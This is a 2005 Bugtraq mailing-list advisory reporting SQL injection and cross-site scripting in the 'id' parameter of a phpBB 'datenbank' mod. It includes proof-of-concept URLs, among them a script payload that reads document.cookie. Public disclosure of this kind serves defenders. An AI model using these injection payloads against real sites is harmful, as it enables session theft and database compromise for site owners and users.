Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

phpBB datenbank mod has XSS/SQL Injection in the id variable
From: tom cruise <the.n3t () gmail com>
Date: 16 Apr 2005 08:30:46 -0000


vulnerable mod:
datenbank

explaination:
you can pass SQL Injection / Cross Site Scripting (Commands) in the id variable inside the mod.php (mod-datenbank)

exploit:
http://[target]/phpBB/moddb/mod.php?id='[SQL Injection]
http://[target]/phpBB/moddb/mod.php?id='>&lt;script&gt;alert(document.cookie)
&lt;/script&gt;

this bugs discovered by : neO
SGT SecurityGurus Team 
www.securitygurus.net

  By Date           By Thread  

Current thread:
  • phpBB datenbank mod has XSS/SQL Injection in the id variable tom cruise (Apr 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]